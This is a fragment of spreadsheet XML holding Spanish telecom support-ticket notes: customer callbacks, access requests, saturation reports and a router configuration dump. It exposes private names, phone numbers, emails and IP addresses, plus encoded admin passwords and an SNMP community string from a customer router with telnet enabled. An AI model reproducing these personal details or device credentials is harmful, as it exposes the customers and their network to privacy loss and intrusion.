**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL NUMERO 59229513 ENVIA DIRECTO A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001153942
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL NUMERO 59229513 SIGUE SIN  RESPONDER,  ENVIA DIRECTO A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001172740
**</t>
  </si>
  <si>
    <t>F4623146</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 16:56
PARA: MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;; NBONILLA@DGI.GOB.NI &lt;NBONILLA@DGI.GOB.NI&gt;; JHERRERA@DGI.GOB.NI &lt;JHERRERA@DGI.GOB.NI&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA F4623146 || 3958220 / ENLACE FO DGI LEON INTERNET PRINCIPAL INTERMITENCIA
*-*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NARCISO BONILLA 83325575 MENCIONA QUE LLEVAN COMO 20 CON EL SERVICIO ESTABLE, SE LE HACE MENCION DE LA SATURACION SEGUN EL DIAGNOSTICO, CLIENTE SOLICITA SE PUEDA ENVIAR POR CORRE LAS PRUEBAS DE LA SATURACION
JHERRERA@DGI.GOB.NI - NBONILLA@DGI.GOB.NI
-ID 3001180810</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NARCISO BONILLA AL 83325575 INIDCA LA  IP PUBLICA 190.184.56.178 PARA QUE SE PUEDA VALIDAR || SE NOTIFICA A GESTOR **
-ID 3001156970
**</t>
  </si>
  <si>
    <t>F4623158</t>
  </si>
  <si>
    <t>COORDINADA VISITA TÉCNICA PARA MAÑANA A LAS 08:00AM A CLIENTE, OPERACIONES REGIÓN ENTERADOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO ESPINOZA AL 23293000 INDICA QUE SI PODRAN ESPERAR AL PERSONAL TECNICO SOLO SOLICITA QUE SE LE ENVIE LA INFORMACION AL CORREO SOPORTE@COMNETSA.COM || SE NOTIFICA A GESTOR **
-ID 3001173997
**</t>
  </si>
  <si>
    <t>F4623172</t>
  </si>
  <si>
    <t>SE HABLA CON VICTOR PERALTA (CLIENTE) INFORMA QUE ELLOS REALIZARON PRUEBAS DE PRIMERA LINEA, SE HABLA CON DELMAR 45707474 (CLIENTE) INFORMA QUE NO TIENE ACCESO A LOS EQUIPOS, SE REALIZA CONFERENCIA CON CENTRAL, APOYA GUIANDO A PR EN UBICAR LOS EQUIPOS, SE REALIZA CONFERENCIA CON SAMUEL ESTRADA (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4623192</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OSCAR AGUIÑADA 78626892 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001175636 - 3001175863</t>
  </si>
  <si>
    <t>F4623198</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILFIDO CUADROS AL 41517763 CONFIRMA SERVICIO ESTABLE Y OPERATIVO   **
-ID 3001215514
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILFIDO CUADROS AL 41517763  NO RESPONDE, ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO **
-ID 3001203218
**</t>
  </si>
  <si>
    <t>F4623210</t>
  </si>
  <si>
    <t>SE LLAMA A 22790909 ATIENDE BRAYAN ENTERADO DE QUE TECNICOS VAN DE CAMINO A ATENDER LA VISITA
3001189601
COLA:
NOMBRE: A: 22790909
NÚMERO: 22790909
DURACIÓN: 0:03:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22790909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/06/2022 15:16:48</t>
  </si>
  <si>
    <t>F4623214</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2243-7253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001393429</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, EN MONITOREO POR 24 HORAS A SOLICITUD DE CLIENTE; SE DEBE VALIDAR SERVICIO MAÑANA A LAS 12:40 HORAS.</t>
  </si>
  <si>
    <t>F4623223</t>
  </si>
  <si>
    <t>SE LLAMÓ A CENTRAL 23386565 EXT 94250 PARA SEGUIMIENTO Y/O QUE NOS BRINDE TELS DEL PR, NO CONTESTA; SE DEBE LLAMAR MAÑANA EN EL TRANSCURSO DEL DÍA; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: AGE-199-MONTUFAR | ENLACE DOWN | CLARO - ID 7300119</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23386565 EXT 94250 MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS DE PERSONAL TECNICO
SE LE MENCIONA QUE SE ESTARA AL PENDIENTE DE QUE PUEDAN RESPONDER LA CADENA DE CORREOS
-ID 3001792905</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23386565 EXT 94250 PARA SEGUIMIENTO, NO CONTESTA; SE LE REENVÍA CORREO PARA QUE NOS APOYE GESTIONANDO LOS PERMISOS A AGENCIA:
ASUNTO: RE: AGE-199-MONTUFAR | ENLACE DOWN | CLARO - ID 7300119</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR AL CLIENTE PERO NO SE OBTIENE RESPUESTA SE INTENTARA LUEGO
3001690658
COLA:
NOMBRE: A: 23386565
NÚMERO: 23386565
DURACIÓN: 0:01:43
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 23386565
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 4/07/2022 09:50:05</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23386565 EXT: 94250 RESPONDE RONY RIVERA QUIEN CONFIRMA QUE LOS PERMISOS YA ESTAN AUTORIZADOS, INFORMA QUE RENNVIO EL CORREO A LA AGENCIA PARA QUE DEN EL INGRESO A PERSONAL TECNICO
-ID 3001870673</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
AGE-199-MONTUFAR | ENLACE DOWN | CLARO - ID 7300119</t>
  </si>
  <si>
    <t>SE ENVIA CORREO NUEVAMENTE AL CLIENTE SOLICITANDO LOS ACCESOS PARA LOS TECNICOS ESTAMOS A LA ESPERA DE SU RESPUESTA
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 10:12
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; WALTER ANIBAL TUY LEON &lt;WALTER.TUY@BAM.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; INFORMATICA.MONITOREO &lt;INFORMATICA.MONITOREO@BAM.COM.GT&gt;; MONITOREO.ENLACESBAM &lt;MONITOREO.ENLACESBAM@BAM.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: AGE-199-MONTUFAR | ENLACE DOWN | CLARO - ID 7300119
BUEN DÍA ESTIMADOS BAM.
EN SEGUIMIENTO AL SERVICIO BAM_GT_AGENCIA_199 || 12 CALLE 0-93 ZONA 9, CENTRO COMERCIAL MONTUFAR.
SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS A LA AGENCIA PARA NUESTRO PERSONAL TÉCNICO, ASÍ COMO BRINDARNOS EL HORARIO DE ATENCIÓN DE LA AGENCIA.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.
DPI¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿IBM¿¿¿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CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A BAM PARA APOYEN CON ACCESOS, PENDIENTE CONFIRMEN O BRINDEN UN HORARIO PARA ATENDER VISITA ||
ASUNTO: RE: AGE-199-MONTUFAR | ENLACE DOWN | CLARO - ID 7300119
ERITO FERNANDO TECU XITUMUL
BUEN DÍA ESTIMADOS BAM.
EN SEGUIMIENTO AL SERVICIO BAM_GT_AGENCIA_199 || 12 CALLE 0-93 ZONA 9, CENTRO COMERCIAL MONTUFAR.
SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS A LA AGENCIA PARA NUESTRO PERSONAL TÉCNICO, ASÍ COMO BRINDARNOS EL HORARIO DE ATENCIÓN DE LA AGENCIA.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>F4623227</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EUDIO PILO 40688943 INDICA QUE AUN PRESENTA PERDIDAS SE SOLICITA LA IP A LA QUE VE PERDIDAS Y BRINDA LA IP 10.8.24.84 | SE LE SOLICITA UN MOMENTO PERO CORTA LLAMADA Y SE INTENTA LLAMAR NUEVAMENTE Y NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001162206 - 3001163518 - 3001163614
**
**</t>
  </si>
  <si>
    <t>F4623235</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE MARROQUIN 42012154 INDICA QUE LO QUE EL HABIA REPORTADO ES QUE NO TENIA LOS DNS DE LOS SERVICIOS PERO INDICA QUE YA LOS TIENE Y QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO**
-ID 3001165282
**</t>
  </si>
  <si>
    <t>F4623237</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BELINDA 98854191 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001386052</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BELINDA  98854191 MENCIONA QUE EL TECNICO SE RETIRO DE PR POR LO QUE INDICA QUE CUANDO REGRESE ELLA DEVOLVERA LA LLAMADA
-ID 3001176759</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BELINDA  AL 98854191 SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE **
-ID 3001168091
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  BELINDA 98854191 NO RESPONDE, ENVIA A BUZON DE VOZ || SE INTENTARA LUEGO**
-ID 301404455
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BELINDA 98854191 NO RESPONDE, SE INTENTARA LUEGO
-ID 301394617</t>
  </si>
  <si>
    <t>F4623245</t>
  </si>
  <si>
    <t>SE LLAMA A LUIS GUZMAN 58958560 PERO CLIENTE CORTA LA COMUNICACION
ID
1001191963
COLA:
NOMBRE: A: 58958560
NÚMERO: 55280199
DURACIÓN: 0:00:26
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/07/2022 16:23:13</t>
  </si>
  <si>
    <t>SE TIENE CONTACTO DE TT ANTERIORES || CARLOS VIELMAN 57748704 || SE LLAMA PERO CLIENTE CORTA LA COMUNICACION. TT PERMANECE EN PC.
ID
3001757519
COLA:
NOMBRE: A: 57748704
NÚMERO: 55280199
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/07/2022 14:34:41</t>
  </si>
  <si>
    <t>F4623247</t>
  </si>
  <si>
    <t>CLIENTE GABRIELA 55168143 REALIZA LLAMADAS ENTRANTES Y SALIENTES, VALIDA QUE YA ESTÁ EL E1 ACTIVO. INDICA QUE AYER SE FUE LA LUZ POR UN BREVE INSTANTE. AUTORIZA EL CIERRE DEL CASO.
3001160347
COLA:
NOMBRE: A: 55168143
NÚMERO: 55168143
DURACIÓN: 0:12:45
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55168143
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 30/06/2022 01:37:59 P. M.</t>
  </si>
  <si>
    <t>F4623333</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIRIAM CORDON AL 23748976 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001312592
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIRIAM CORDON AL 23748976 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001171386
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIRIAM CORDON 23748976 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001187911</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIRIAM CORDON 23748976 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001197524
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIRIAM CORDON AL 23748976 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001257650
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JASSON GAITAN 44701686 SUENA DESCONECTADO
-ID 3001262173 - 3001262227</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIRIAM CORDON 23748976 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001261569</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIRIAM CORDON 23748976 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001216175
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MIRIAM CORDON 23748976  NO RESPONDE, SE INTENTARA LEGO
-ID 3001225749</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JASSON GAITAN AL 44701686 SUENA DESCONECTADO**
-ID 3001313342
**</t>
  </si>
  <si>
    <t>F4623338</t>
  </si>
  <si>
    <t>F4623354</t>
  </si>
  <si>
    <t>TECNICO JEFFREY MENDOZA 50587339666 QUIEN COMENTA QUE EN SITIO REMOTO LE INDICAN QUE NO SE PUEDE BOTAR SERVICIO  PORQUE ELLOS EN TIENDA TIENEN CLIENTES, SE LLAMA A CL QUIEN REPORTA JOSUE HERRERA   / 506 70136426 QUIEN INDICA QUE VA A VER CON LA TIENDA PARA QUE DEJEN TRABAJAR AL TÉCNICO
3001216159
COLA:
NOMBRE: A: 50670136426
NÚMERO: 50670136426
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50670136426
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/06/2022 16:58:51</t>
  </si>
  <si>
    <t>F4623373</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623373
ID:  245700273T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_INTERNET_CAMOJA
UBICADO EN:  INTERNET_15.638637, 9.919690, CAMOJA, HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4623374</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MACHON AL 25279047 CONTESTA EL SEÑOR JOSEP  MALDONADO CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001400945
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25279044 MENCIONA QUE EL SERVICIO ES INTERMITENTE
-ID 3001197004
NOMBRE DEL CLIENTE: IMPRESSA S.A.
UBICACIÓN:CALLE CONCEPCION 1113 VOULEBARD CISNEROS, SAN SALVADOR
CONTACTO EN SITIO: EDGAR MERINO - 78409576
HORARIO DE ATENCION:7:30 - 17:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS MACHON NÚMERO 0050325279047, QUIEN INDICA QUE SERVICIO ACTUALMENTE ESTABLE Y DESEA QUE SE MANTEGA EN OBSERVACIÓN HASTA LAS  4:00 PM DEL DÍA DE HOY VIERNES 1/07/2022.
3001256047
COLA:
NOMBRE: A: 0050325279047
NÚMERO: 0050325279047
DURACIÓN: 0:01:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050325279047
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 1/07/2022 07:55:20</t>
  </si>
  <si>
    <t>F4623391</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDNA OSORIO 59492272 CLIENTE NO RESPONDE || ENVIA DIRECTO A BUZON DE VOZ ||
SE INTENTARA LUEGO **
-ID 3001205508
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDNA OSORIO 59492272CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001194239
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDNA OSORIO 59492272 QUIEN INDICA QUE AUN NO TIENE SERVICIO SE LE INDICA QUE NO ESTA CONECTADA SU RED LAN Y QUE TENDRIA QUE VERIFICAR CON SU PERSONAL DE IT CLIENTE AGRADECE E INDICA QUE ESTARA VERIFICANDO INTERNAMENTE CON EL TECNICO**
-ID 3001260575
**</t>
  </si>
  <si>
    <t>F4623395</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROGER DUARTE /85932023   QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001265351</t>
  </si>
  <si>
    <t>F4623409</t>
  </si>
  <si>
    <t>SE ENVIAN LAS GRAFICAS SOLICITADAS
DE: ALEJANDRO NAVARRO FERNANDEZ
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 15:10
PARA: LARMAS1210@GMAIL.COM &lt;LARMAS1210@GMAIL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GRÁFICA DE CONSUMO | IGSS ESCUINTLA
BUENAS TARDES ING:
COMO PARTE DEL SEGUIMIENTO AL CASO CON 874400002T IGSS ESCUINTLA, SEGUIDAMENTE ADJUNTAMOS LAS GRÁFICAS DEL CONSUMO SOLICITADAS, EN EL HORARIO COMPRENDIDO DE 07:00 Y LAS 15:00 (FIGURA 1). EN LA MISMA SE PUEDEN OBSERVAR PICOS DE SATURACIÓN, POR LO QUE POR MOMENTOS SE PUEDEN NOTAR EN SITIO INESTABILIDAD DEBIDO A LA MISMA. DE ANTEMANO GRACIAS. QUEDAMOS AL PENDIENTE
FIGURA 1.</t>
  </si>
  <si>
    <t>F4623413</t>
  </si>
  <si>
    <t>CASO ESCALADO CON BO SEGURIDAD PARA EL DESLIST; ADICIONAL SE LLAMÓ A EJECUTIVA CLARO 58266937 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA; SE ENVÍA CORREO:
ASUNTO: RE: LISTA NEGRA</t>
  </si>
  <si>
    <t>BO SEGURIDAD CLARO TRABAJANDO EN EL DESLIST; ADICIONAL SE LLAMÓ/HABLÓ CON MARLEN FLORES EJECUTIVA 58266937 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4623438</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONEL ORDOÑEZ 41822953 MENCIONA QUE YA LE ESTA DANDO SEGUIMIENTO CON SU EJECUTIVO POR EL CAMBIO DE TECNOLOGIA
-ID 3001397482</t>
  </si>
  <si>
    <t>F4623458</t>
  </si>
  <si>
    <t>SE OBSERVA REINICIO EN CPE | | ARP Y ESTADO DE LAS INTERFACES | | CONFIGURACION DEL CPE
&lt;CC_CAMPERO_GT_INTERNET_C660&gt;DISPLAY VERSION
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR100 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR109W ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 11 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 10 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR109W
4. BOOTROM  VERSION  : 1
&lt;CC_CAMPERO_GT_INTERNET_C660&gt;DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.105.5.46     8C42-6DE9-96D0            I -         GE0/0/4
10.105.5.33     DC99-147A-9859  20        D-0         GE0/0/4
181.209.244.229 8C42-6DE9-96CF            I -         VLANIF1
181.209.244.228 INCOMPLETE      1         D-0         VLANIF1
                                             1/-
181.209.244.230 INCOMPLETE      1         D-0         VLANIF1
                                             1/-
------------------------------------------------------------------------------
TOTAL:5         DYNAMIC:3       STATIC:0     INTERFACE:2
&lt;CC_CAMPERO_GT_INTERNET_C660&gt;DISPLAY IP INTERFACE BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 4
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 2
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 4
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 2
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
ETHERNET0/0/0                     UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/4              10.105.5.46/27       UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.212.171.96/32     UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           181.209.244.229/30   UP         UP
&lt;CC_CAMPERO_GT_INTERNET_C660&gt;DISPLAY INTERFACE DESCRIPTION
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
ETH0/0/0                      *DOWN   DOWN     INTERFACE NO SE ENCUENTRA EN USO
GE0/0/0                       DOWN    DOWN     LAN DEL CLIENTE
GE0/0/1                       DOWN    DOWN     INTERFACE NO SE ENCUENTRA EN USO
GE0/0/2                       DOWN    DOWN     INTERFACE NO SE ENCUENTRA EN USO
GE0/0/3                       *DOWN   DOWN     INTERFACE NO SE ENCUENTRA EN USO
GE0/0/4                       UP      UP       WAN PRINCIPAL/_/38300526T/_/
GE0/0/5(V)                    *DOWN   DOWN     INTERFACE NO SE ENCUENTRA EN USO
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       LAN DEL CLIENTE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
&lt;CC_CAMPERO_GT_INTERNET_C660&gt;DISPLAY CURRENT
[V200R009C00SPC500]
#
 SYSNAME CC_CAMPERO_GT_INTERNET_C660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DOMAIN DEFAULT_GESTIONIP
  AUTHENTICATION-SCHEME RADIUS
  RADIUS-SERVER DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER %^%#:%/&amp;I&amp;PALY)&gt;6LVVI.OAZA/P;XA7WMQ.P8XYFJD0#T4M6H:~NKG.Q1H*D8OB%^%#
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TERMINAL HTTP
 LOCAL-USER GESTIONIP PASSWORD IRREVERSIBLE-CIPHER $1A$$&gt;1P4[|!YI$UT6.&amp;-IZ;4AM.B8*#KU+MI#=/=L4D)A[P8*A*NC6$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP FTP-DIRECTORY FLASH:/
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET SSH FTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 181.209.244.229 255.255.255.252
 QOS CAR INBOUND ACL 2000 CIR 5120 CBS 960000 PBS 1920000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND ACL 2000 CIR 5120 CBS 960000 PBS 1920000 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE ETHERNET0/0/0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION LAN DEL CLIENTE
 PORT LINK-TYPE ACCESS
#
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/38300526T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 5
 IP ADDRESS 10.105.5.46 255.255.255.224
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
 IP ADDRESS DHCP-ALLOC
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.171.96 255.255.255.255
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1200
#
 CPU-DEFEND-POLICY ICMP
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB038C426DE996CF
 SNMP-AGENT COMMUNITY READ %^%#R.C)5O9=LBXKQS7$XN*2YAK2PWXP\'6OZ.XY,#O8V{EK9GI/%3D*QSGMOUF/`&lt;U~B/H5|'5G;O'1NP;R%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION AVENIDA CENTROAMERICA 1-40 ZONA 3 ESCUINTLA C.C PRADERA ESCUINTLA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.105.5.33 DESCRIPTION DEFAUL-WAN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660&gt;</t>
  </si>
  <si>
    <t>F4623466</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE. QUIEN AUTORIZA EL CIERRE.
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SE LES INFORMA QUE EL DÍA DE HOY SE REVISO EL SERVICIO IPPBX CON EL NUMERO DE GD 22183200 EDITORIAL VISION TRES MIL UNO, EN EL CUAL REPORTARON CORTE DE LLAMADAS.
SE REVISO EL SERVICIO Y POR PARTE DE CLARO NO SE OBSERVO AFECTACIÓN.
SE MANTUVO EN MONITOREO POR DOS HORAS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE EDGAR VALENZUELA QUIEN INDICA QUE HASTA EL MOMENTO NO HA FALLADO EL SERVICIO.
SOLICITA QUE SE LE ENVIE UN CORREO.
3001214261
COLA:
NOMBRE: A: 50630484
NÚMERO: 50630484
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 50630484
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/06/2022 16:47:11</t>
  </si>
  <si>
    <t>F4623506</t>
  </si>
  <si>
